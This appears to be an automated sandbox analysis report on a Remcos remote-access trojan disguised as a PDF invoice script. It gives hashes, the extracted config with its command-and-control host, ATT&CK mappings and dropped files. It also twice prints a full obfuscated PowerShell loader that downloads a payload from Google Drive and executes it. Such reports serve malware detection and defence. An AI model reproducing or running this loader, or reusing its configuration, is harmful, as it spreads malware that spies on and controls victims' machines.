remcos | 4d27a5b289b20ed90da413356202928932d7742a39f3c1d4ecb6ac9d267b91ef

General

Target

Faktura_82666410_1361590461·pdf.vbe
Size

74KB
MD5

f1a0355012d13febdfb56ee8d2b38012
SHA1

38fb764e45b496b63b7a49713fac2b411cfc524b
SHA256

670cb64bd0bbb0baf70d835715afa71ab16e20b3b409e66a2fd5fedfdb375f2b
SHA512

5b2b82e2b7fef9f2d1725ee2a13a98c415880abb41e5c7c7d3fedaed67b7b3decc616f5f12ae9231859f01ca56b31fcf16d0da4b90904a740ad8ba8a882b27fa
SSDEEP

1536:spE42QeC4Ud8kA8fEXzY+gRj+u6/GgRIHSHMy+eQ74Zf:sprLeyAsEtu6uKAO5f

Score

10^/10

remcos remotehost discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WDQFG0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 12 IoCs

flow	pid	Process
5	2412	powershell.exe
6	2412	powershell.exe
8	2412	powershell.exe
10	1260	msiexec.exe
12	1260	msiexec.exe
14	1260	msiexec.exe
16	1260	msiexec.exe
17	1260	msiexec.exe
19	1260	msiexec.exe
21	1260	msiexec.exe
28	1260	msiexec.exe
29	1260	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2412	powershell.exe
2720	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
6	drive.google.com
10	drive.google.com

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2720	powershell.exe
2412	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1260	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2720	powershell.exe
1260	msiexec.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2720 set thread context of 1260	2720	powershell.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2412	powershell.exe
2720	powershell.exe
2720	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2720	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1260	msiexec.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2356 wrote to memory of 2412	2356	WScript.exe	30
PID 2356 wrote to memory of 2412	2356	WScript.exe	30
PID 2356 wrote to memory of 2412	2356	WScript.exe	30
PID 2720 wrote to memory of 1260	2720	powershell.exe	36
PID 2720 wrote to memory of 1260	2720	powershell.exe	36
PID 2720 wrote to memory of 1260	2720	powershell.exe	36
PID 2720 wrote to memory of 1260	2720	powershell.exe	36
PID 2720 wrote to memory of 1260	2720	powershell.exe	36
PID 2720 wrote to memory of 1260	2720	powershell.exe	36
PID 2720 wrote to memory of 1260	2720	powershell.exe	36
PID 2720 wrote to memory of 1260	2720	powershell.exe	36
PID 2720 wrote to memory of 1260	2720	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktura_82666410_1361590461·pdf.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes 'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom ');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs (Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d ') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes 'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs (Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena. LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco, Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes 'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom ');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs (Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d ') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes 'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs (Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena. LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco, Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Windows\syswow64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

1

T1046

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
25d9f3cb7a4b3078a03fa40ad29ae2a1

SHA1
a3b076df11ff5116016859376e86b9193019c762

SHA256
1b4dec0d2dfd7bc38f7a9c2d88d7ebc4089cc96b9ee01cc16f6ba43168883efd

SHA512
c298b7f584f958a56a3f0cef1c1ab040c6138577933d05cd42fad4e576cfd901ed9ee453657f8f9791f11132e7927006bd006e03906994384530557bb9566187

Download Submit
C:\Users\Admin\AppData\Roaming\Kanalseparationen.Gte

Filesize
404KB

MD5
79bd3fbef131ecc854054049edcff107

SHA1
e9ed9087470ed08fb205afd7a16418877e58889b

SHA256
23fd943f1b414c05e01dc52336058af7fbb24ccd5ad727cb5489a1f6573fc229

SHA512
6f9252026339711bd298f0d9e4b4aa0bca02072c0b4b8f8ca5e8f46299a051bacba15bc2470abe47022a927879b633d41b5be995cce9265a33b5173461f3426b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X6QHMP2620EJB2WBDFKI.temp

Filesize
7KB

MD5
29e25876309ec63092e340efb48bffa8

SHA1
b5fd65669ad9d9e1425781fe389130068be8aa2e

SHA256
6455c0d7805e51d54bb617f549037725b600af3f327e5434f30a5c6ab94a47e6

SHA512
9b77e49211bdc62594dffac3684e02b73708cec4378aa70ceeb3d36ce2f8aba9ec9796cf4c37cf79e1ca1cf97e6324431ea2006f8720d5eec455967736023db0

Download Submit
memory/1260-42-0x0000000000CE0000-0x0000000001D42000-memory.dmp

Filesize
16.4MB

Download
memory/1260-20-0x0000000000CE0000-0x0000000001D42000-memory.dmp

Filesize
16.4MB

Download
memory/2412-12-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2412-10-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2412-11-0x000007FEF674E000-0x000007FEF674F000-memory.dmp

Filesize
4KB

Download
memory/2412-4-0x000007FEF674E000-0x000007FEF674F000-memory.dmp

Filesize
4KB

Download
memory/2412-15-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2412-9-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2412-8-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2412-7-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2412-6-0x00000000023C0000-0x00000000023C8000-memory.dmp

Filesize
32KB

Download
memory/2412-5-0x000000001B520000-0x000000001B802000-memory.dmp

Filesize
2.9MB

Download
memory/2720-19-0x0000000006660000-0x0000000007252000-memory.dmp

Filesize
11.9MB

Download

Analysis

Sharing